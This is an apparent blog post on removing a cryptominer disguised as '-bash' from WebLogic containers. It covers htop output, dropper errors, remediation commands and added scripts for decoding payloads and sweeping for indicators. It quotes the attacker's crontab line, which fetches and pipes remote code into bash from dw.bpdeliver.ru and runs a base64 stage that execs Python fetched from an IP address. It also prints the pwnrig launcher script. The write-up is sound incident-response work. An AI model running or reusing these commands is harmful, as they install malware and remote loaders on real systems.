Mining malware: cleaning up the "-bash" miner

Problem description

The server's memory usage suddenly became very high, frequently above 90%.

Looking at the processes with htop shows:

 1  [|||||||||||||||||||||||||||||||100.0%]   Tasks: 169, 793 thr; 4 running
 2  [||                       2.0%]   Load average: 2.16 2.17 2.52 
 3  [|||||||||||||||||||||||||||||||||||||||||100.0%]   Uptime: 13 days, 16:02:59
 4  [|| ||||||||||||||||||||||13.0G/15.2G] Swp[            0K/0K]
  PID USER      PRI  NI  VIRT   RES   SHR S CPU% MEM%   TIME+  Command 
17839 root       20   0 2386M 2346M     4 S  0.0 15.1  0:00.61 -bash
17841 root       20   0 2386M 2346M     4 S  0.0 15.1  0:00.55 -bash
17842 root       20   0 2386M 2346M     4 S  0.0 15.1  0:00.54 -bash
17843 root       20   0 2386M 2346M     4 S  0.0 15.1  0:00.54 -bash
17844 root       20   0 2386M 2346M     4 S  0.0 15.1  0:00.55 -bash
 8099 root       20   0 2386M 2346M     4 R 100. 15.1  6h53:51 -bash
 8100 root       20   0 2386M 2346M     4 R 99.7 15.1  6h53:51 -bash
17835 root       20   0 2386M 2346M     4 S 200. 15.1 13h48:44 -bash
28020 root       20   0  112M  2208  1676 S  0.0  0.0  0:00.08 -bash

Several of these processes are named "-bash".

Analysis

This is almost certainly a cryptominer masquerading as "-bash". The name is chosen deliberately: an interactive login shell is also listed as "-bash" in ps/htop (login sets argv[0] with a leading dash), so the miner blends in with legitimate shells. Two things give it away in the listing above. A real bash never holds about 2.3 GB resident, yet every one of the suspect processes shows RES 2346M, and PIDs 8099, 8100 and 17835 have been pinned at 100-200% CPU for hours while a shell normally sits idle. PID 28020, at 112M virtual and 2208K resident, is what a genuine login shell looks like.

Check the scheduled tasks

crontab -l

(The entry below carries a user field, `root`, between the schedule and the command. That is the format of /etc/crontab and /etc/cron.d/*, not of a per-user crontab, so those files have to be checked as well; the dropper output further down shows it writing /etc/cron.d/apache.)

*/10 * * * * root (curl -s http://dw.bpdeliver.ru/xms?cron || wget -q -O - http://dw.bpdeliver.ru/xms?cron || lwp-download http://dw.bpdeliver.ru/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly83Ny45MS44NC40Mi9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vNzcuOTEuODQuNDIvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo 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 | base64 -d | bash -
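Before acting on an entry like this, it is worth decoding what it stages rather than guessing from the URLs alone. The following shell script is an added example, not part of the original post: it pulls every base64 blob out of a cron line, decodes it for display, and lists the URLs and IP addresses the line and its decoded stages reference so they can be blocked at egress. The input is constructed from the crontab entry quoted above (the second base64 blob is missing from this page and is omitted); nothing that is decoded gets executed.

```shell
#!/bin/sh
# Added example (not from the original post): decode the staged payloads in
# a cron line and extract network IOCs. Display only; nothing is run.

# Sample input, constructed from the crontab entry quoted above. The second
# "echo ... | base64 -d | bash -" stage is not recoverable and is left out.
CRON_LINE='*/10 * * * * root (curl -s http://dw.bpdeliver.ru/xms?cron || wget -q -O - http://dw.bpdeliver.ru/xms?cron || lwp-download http://dw.bpdeliver.ru/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly83Ny45MS44NC40Mi9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vNzcuOTEuODQuNDIvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -'

# decode_stages: for each base64 blob (40+ chars) on stdin, print the
# decoded text followed by a newline. Blobs that fail to decode print empty.
decode_stages() {
    grep -oE '[A-Za-z0-9+/]{40,}={0,2}' | while IFS= read -r blob; do
        printf '%s' "$blob" | base64 -d 2>/dev/null
        printf '\n'
    done
}

# extract_iocs: URLs and bare IPv4 addresses from the raw line on stdin plus
# its decoded stages, de-duplicated. Feed the result to your egress/DNS block.
extract_iocs() {
    line=$(cat)
    {
        printf '%s\n' "$line"
        printf '%s\n' "$line" | decode_stages
    } | grep -oE 'https?://[A-Za-z0-9._/?=-]+|([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u
}

# Usage: show the decoded stage, then the IOC list.
printf '%s\n' "$CRON_LINE" | decode_stages
printf '%s\n' "$CRON_LINE" | extract_iocs
```

On this entry the decoded stage is a one-liner that fetches and exec()s a Python script from a second host, so the IOC list is longer than the cron line itself suggests; that is the point of decoding before blocking.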

Running the bash command

Simply running `bash` inside the container does not start a shell; it runs the dropper. The `bash` binary has been replaced by the malware's installer script, which is why the output below is full of `bash: line N:` errors, attempts to call chattr, ufw and iptables, writes to /etc/cron.d and a systemd unit, a resolver change, and a curl download of /tmp/xms.

$ bash

bash
mkdir: cannot create directory '/var/tmp': File exists
mount: can't find /tmp in /etc/fstab
mount: can't find /var/tmp in /etc/fstab
bash: line 13: ufw: command not found
iptables v1.4.21: can't initialize iptables table `filter': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
iptables v1.4.21: can't initialize iptables table `filter': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
iptables v1.4.21: can't initialize iptables table `filter': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
iptables v1.4.21: can't initialize iptables table `filter': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
bash: line 18: chattr: command not found
nameserver 8.8.8.8
nameserver 8.8.4.4
bash: line 73: chattr: command not found
bash: line 74: chattr: command not found
Failed to get D-Bus connection: Operation not permitted
Configuration file /etc/systemd/system/linux-d.service is marked executable. Please remove executable permission bits. Proceeding anyway.
bash: line 142: chattr: command not found
bash: line 86: chattr: command not found
bash: line 87: /etc/cron.d/apache: Permission denied
bash: line 94: /var/spool/cron/crontabs/root: No such file or directory
bash: line 146: chattr: command not found
bash: line 42: chattr: command not found
bash: line 43: wget: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 2310k  100 2310k    0     0   851k      0  0:00:02  0:00:02 --:--:--  851k

bash: /tmp/xms: No such file or directory
^CTraceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<string>", line 5, in <module>
KeyboardInterrupt
||  ERROR  || already running...
||  ERROR  || already running...
sh: line 1: -pwn: command not found
/tmp/ircd: line 1: a: No such file or directory

Check the cron job files

All three of /etc/cron.weekly, /etc/cron.daily and /etc/cron.hourly contain scripts planted by the miner; the one in cron.daily is shown below.

vim /etc/cron.daily/pwnrig

#!/bin/bash
# copy the miner, stored as /bin/crondr, to a file literally named "-bash"
cp -f -r -- /bin/crondr /bin/-bash 2>/dev/null
cd /bin 2>/dev/null
# launch it; in ps/htop it now looks like a login shell
./-bash -c  >/dev/null 2>&1
# delete the on-disk copy once it is running
rm -rf -- -bash 2>/dev/null

Remediation

# First remove the crontab entry
$ crontab -e

# Remove the cron scripts
$ rm -rf /etc/cron.weekly/*  /etc/cron.daily/* /etc/cron.hourly/*

# cron is not needed in this container, so remove the cron binaries as well
# (crondr is the miner copy; on CentOS 7 /bin is a symlink to /usr/bin, so /bin/crondr and /usr/bin/crondr are the same file)
rm -rf /bin/crontab  /usr/sbin/crond  /usr/bin/crondr

# Remove the replaced bash and sh
rm -rf /usr/bin/bash /usr/bin/sh
rm -rf /bin/bash  /bin/sh

# Then copy clean copies in from the host
docker cp /usr/bin/bash ts_weblogic12_smxb3:/usr/bin/
docker cp /bin/bash ts_weblogic12_smxb3:/bin/

docker cp /usr/bin/sh ts_weblogic12_smxb3:/usr/bin/
docker cp /bin/sh ts_weblogic12_smxb3:/bin/

Two caveats on this step. A binary copied from the host only works if the host's glibc is compatible with the container's (the second container is CentOS 7); if it is not, take bash from a freshly pulled copy of the same base image instead. And `crontab -e` only edits the per-user crontab: the dropper output above shows it writing /etc/cron.d/apache and a unit at /etc/systemd/system/linux-d.service, so /etc/crontab, /etc/cron.d/* and that unit file need checking too. More generally, since these are containers, rebuilding from a clean image is the cleaner fix, and whatever let the dropper in (both containers run WebLogic) has to be closed or the miner will be back.

Kill the process

On this box the miner ran under the name dbused. Remove the crontab entry and kill the process before deleting files; otherwise the */10 cron job pulls the dropper back down every ten minutes while you are cleaning.

 docker exec -it  ts_weblogic12_smxb3 sh
 pkill dbused
 

The other container

docker exec -it  ts-centos7-weblogic12-2  sh

# Remove the cron scripts
$ rm -rf /etc/cron.weekly/*  /etc/cron.daily/* /etc/cron.hourly/*

# cron is not needed here either, so remove the cron binaries
rm -rf /bin/crontab  /usr/sbin/crond  /usr/bin/crondr

# Remove the replaced bash and sh
rm -rf /usr/bin/bash /usr/bin/sh
rm -rf /bin/bash  /bin/sh


docker cp /usr/bin/bash ts-centos7-weblogic12-2:/usr/bin/
docker cp /bin/bash ts-centos7-weblogic12-2:/bin/

docker cp /usr/bin/sh ts-centos7-weblogic12-2:/usr/bin/
docker cp /bin/sh ts-centos7-weblogic12-2:/bin/
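Deleting and re-copying by hand leaves no record of what was actually there. As an added example, not the author's procedure, the following read-only sweep checks a filesystem for the artifacts this dropper leaves behind, using only paths that appear in the dropper output and cron scripts above, verifies that bash and sh are real ELF binaries rather than a script, and identifies live "-bash" processes that are not login shells. The `ROOT` argument (so it can be pointed at an exported container rootfs as well as `/`) and the cron-directory listing are my additions; the page names only /etc/cron.daily/pwnrig, so the other cron directories are listed for review rather than flagged. Run it before the deletions to record findings and again afterwards to confirm they took.

```shell
#!/bin/sh
# Added example (not from the original post): read-only sweep for the
# artifacts named in the dropper output and cron scripts above. ROOT is the
# filesystem to inspect: / inside the container, or a docker export tree.

# Paths taken from the dropper's error output and the pwnrig script above.
IOC_PATHS="bin/crondr usr/bin/crondr bin/-bash etc/cron.d/apache
etc/cron.daily/pwnrig etc/systemd/system/linux-d.service tmp/xms tmp/ircd
var/spool/cron/crontabs/root"

# is_elf FILE: true when FILE starts with the ELF magic 7f 45 4c 46.
# A real bash/sh is an ELF binary; on the infected box "bash" was a script.
is_elf() {
    [ "$(head -c 4 "$1" 2>/dev/null | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]
}

# sweep ROOT: print one line per finding; return 1 if anything was found.
sweep() {
    root=${1:-/}
    found=0
    for p in $IOC_PATHS; do
        if [ -e "$root/$p" ]; then
            echo "IOC path present: $root/$p"
            found=1
        fi
    done
    for s in bin/bash bin/sh usr/bin/bash usr/bin/sh; do
        f="$root/$s"
        [ -e "$f" ] || continue
        if ! is_elf "$f"; then
            echo "shell is not an ELF binary (replaced by a script?): $f"
            found=1
        fi
    done
    # Only cron.daily/pwnrig is named on the page; list the cron dirs for review.
    for d in etc/cron.hourly etc/cron.daily etc/cron.weekly; do
        [ -d "$root/$d" ] && [ -n "$(ls -A "$root/$d")" ] &&
            echo "review: $root/$d contains: $(ls -A "$root/$d" | tr '\n' ' ')"
    done
    return $found
}

# suspect_procs: live check, run inside the container before pkill.
# A login shell shows "-bash" only in argv[0] (/proc/PID/cmdline); its
# /proc/PID/comm is "bash" because comm comes from the executable's name.
# The miner's file is literally named -bash, so its comm is "-bash", and
# since pwnrig deletes the file after launch, /proc/PID/exe usually ends in
# "(deleted)".
suspect_procs() {
    for d in /proc/[0-9]*; do
        [ -r "$d/comm" ] || continue
        if [ "x$(cat "$d/comm")" = "x-bash" ]; then
            echo "pid ${d#/proc/}: comm=-bash exe=$(readlink "$d/exe" 2>/dev/null)"
        fi
    done
}

# Usage:  sweep /           (inside the container, via docker exec)
#         sweep /mnt/ctr    (rootfs from docker export, untarred to /mnt/ctr)
#         suspect_procs     (inside the container; then pkill by the PIDs shown)
```

The ELF check is the one that matters most here: it is exactly the test that would have shown, before anyone typed `bash`, that the shell had been swapped for the installer.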

posted on 2023-11-29 11:09 by 没刮胡子
